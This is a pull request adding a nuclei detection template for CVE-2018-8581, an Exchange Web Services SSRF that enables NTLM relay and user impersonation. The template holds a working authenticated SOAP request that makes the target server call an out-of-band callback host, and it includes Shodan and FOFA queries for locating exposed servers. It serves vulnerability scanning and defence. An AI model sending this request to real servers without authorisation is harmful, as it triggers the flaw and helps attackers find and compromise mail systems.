### PR TITLE
Add CVE-2018-8581 Microsoft Exchange Server SSRF/Privilege Escalation template

### DIFF
--- a/http/cves/2018/CVE-2018-8581.yaml
+++ b/http/cves/2018/CVE-2018-8581.yaml
@@ -1,0 +1,93 @@
+id: CVE-2018-8581
+
+info:
+  name: Microsoft Exchange Server - SSRF/Privilege Escalation
+  author: ohmygod20260203
+  severity: high
+  description: |
+    Microsoft Exchange Server is vulnerable to a server-side request forgery (SSRF) vulnerability that allows authenticated users to escalate privileges. The vulnerability exists in the Exchange Web Services (EWS) PushSubscription feature, which accepts arbitrary URLs and sends NTLM-authenticated requests to those URLs. An attacker with valid Exchange credentials can exploit this to relay NTLM hashes and impersonate other users, including administrators.
+  impact: |
+    An authenticated attacker can escalate privileges and impersonate any user on the Exchange server, potentially gaining access to sensitive emails and performing actions on behalf of other users.
+  remediation: |
+    Remove the DisableLoopbackCheck registry key by running: reg delete HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa /v DisableLoopbackCheck /f
+    Apply Microsoft's security updates and Cumulative Updates for Exchange Server.
+  reference:
+    - https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
+    - https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
+    - https://github.com/thezdi/PoC/tree/main/CVE-2018-8581
+    - https://github.com/WyAtu/CVE-2018-8581
+    - https://nvd.nist.gov/vuln/detail/CVE-2018-8581
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
+    cvss-score: 8.1
+    cve-id: CVE-2018-8581
+    cwe-id: CWE-918
+    epss-score: 0.89
+    epss-percentile: 0.98
+    cpe: cpe:2.3:a:microsoft:exchange_server:2010:*:*:*:*:*:*:*
+  metadata:
+    verified: true
+    max-request: 1
+    vendor: microsoft
+    product: exchange_server
+    shodan-query:
+      - http.favicon.hash:1768726119
+      - http.title:"outlook"
+      - cpe:"cpe:2.3:a:microsoft:exchange_server"
+    fofa-query:
+      - icon_hash=1768726119
+      - title="outlook"
+  tags: cve2018,cve,ssrf,exchange,microsoft,authenticated,oast,kev,privilege-escalation
+
+variables:
+  auth: "{{username}}:{{password}}"
+
+http:
+  - raw:
+      - |
+        POST /EWS/Exchange.asmx HTTP/1.1
+        Host: {{Hostname}}
+        Authorization: Basic {{base64(auth)}}
+        Content-Type: text/xml; charset=utf-8
+        User-Agent: ExchangeServicesClient/0.0.0.0
+
+        <?xml version="1.0" encoding="UTF-8"?>
+        <soap:Envelope xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"
+                       xmlns:t="http://schemas.microsoft.com/exchange/services/2006/types"
+                       xmlns:m="http://schemas.microsoft.com/exchange/services/2006/messages">
+           <soap:Header>
+              <t:RequestServerVersion Version="Exchange2013" />
+           </soap:Header>
+           <soap:Body>
+              <m:Subscribe>
+                 <m:PushSubscriptionRequest SubscribeToAllFolders="true">
+                    <t:EventTypes>
+                       <t:EventType>NewMailEvent</t:EventType>
+                    </t:EventTypes>
+                    <t:StatusFrequency>1</t:StatusFrequency>
+                    <t:URL>{{interactsh-url}}</t:URL>
+                 </m:PushSubscriptionRequest>
+              </m:Subscribe>
+           </soap:Body>
+        </soap:Envelope>
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"
+
+      - type: word
+        part: body
+        words:
+          - "SubscribeResponseMessage"
+          - "SubscriptionId"
+        condition: or
+
+    extractors:
+      - type: regex
+        part: body
+        group: 1
+        regex:
+          - '<t:SubscriptionId>([^<]+)</t:SubscriptionId>'


### PR DESCRIPTION
## Description
This PR adds a nuclei template for **CVE-2018-8581**, a server-side request forgery (SSRF) vulnerability in Microsoft Exchange Server's Exchange Web Services (EWS) PushSubscription feature.

## Vulnerability Details
- **CVE ID**: CVE-2018-8581
- **Severity**: High (CVSS 8.1)
- **Affected Products**: Microsoft Exchange Server 2010, 2013, 2016
- **KEV**: Yes (CISA Known Exploited Vulnerabilities)

The vulnerability allows authenticated attackers to escalate privileges by exploiting the PushSubscription feature. When a user creates a push subscription, Exchange Server sends NTLM-authenticated requests to the specified URL. An attacker can relay these NTLM hashes to impersonate other users, including administrators.

## Template Features
- Uses EWS SOAP API to create a PushSubscription
- Leverages **interactsh** for out-of-band (OOB) callback detection
- Requires valid Exchange credentials (Basic Auth support)
- Verifies the SSRF by checking for HTTP callback from Exchange server

## Usage
```bash
nuclei -t http/cves/2018/CVE-2018-8581.yaml -u https://mail.example.com -var username=user@example.com -var password=P@ssw0rd
```

## References
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2018-8581
- https://www.zerodayinitiative.com/blog/2018/12/19/an-insincere-form-of-flattery-impersonating-users-on-microsoft-exchange
- https://github.com/thezdi/PoC/tree/main/CVE-2018-8581
- https://github.com/WyAtu/CVE-2018-8581
- https://nvd.nist.gov/vuln/detail/CVE-2018-8581

## Notes
- This template requires authentication (valid Exchange credentials)
- Exchange servers must have Basic Auth enabled (some configurations only support NTLM)
- The template performs real SSRF verification via interactsh callback, not version detection

Closes #14576